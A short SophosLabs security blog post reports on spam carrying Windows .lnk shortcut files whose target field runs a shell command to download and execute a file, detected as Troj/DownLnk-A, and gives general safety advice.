A Long Shortcut

Filed Under: SophosLabs

Drivng to family for Christmas, some of you may have tried taking a shortcut to avoid traffic queues. Sometimes those "shortcuts" can end up longer than the original route, but hopefully they did not get you into as much trouble as some of the shortcuts we have been seeing in spam recently.

I am talking about Windows ".lnk" shortcut files. Question: Can a shortcut cause a legitimate application on your computer to do malicious things?

Answer: Yes, easily. Take a look at the following, which arrived via one of our spam traps this morning:

 Shortcut Properties Page

"Target" shows just the start of a command with a long sequence of parameters - effectively a script. You can see enough to get the idea: using the command shell it will echo a series of commands to be executed, the first one of which opens a connection to a remote website. You can probably guess what the next command is: "get" - to download a file, which will then be executed. In short, this .lnk file is a downloader Trojan.

Over the past few weeks we have seen an increasing number of such shortcut links sent out in spam. This morning's was detected as Troj/DownLnk-A. Previous examples include Troj/Dloadr-BVT. Since today was a fairly quiet day I have had time to prepare some generic detection for this technique. Over the next few days we will be scanning the web looking for where the technique is used, whether it has any legitimate uses, and if so how to differentiate legitimate samples from malware.

Meanwhile, stay safe online. Do not click on links from sources you do not trust or that seem out of context. Do not assume any kind of file attachment is safe - the bad guys are always making use of new tricks and exploits.

I also hope those of you still travelling have safe journeys over this festive season.

Robert

You might like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s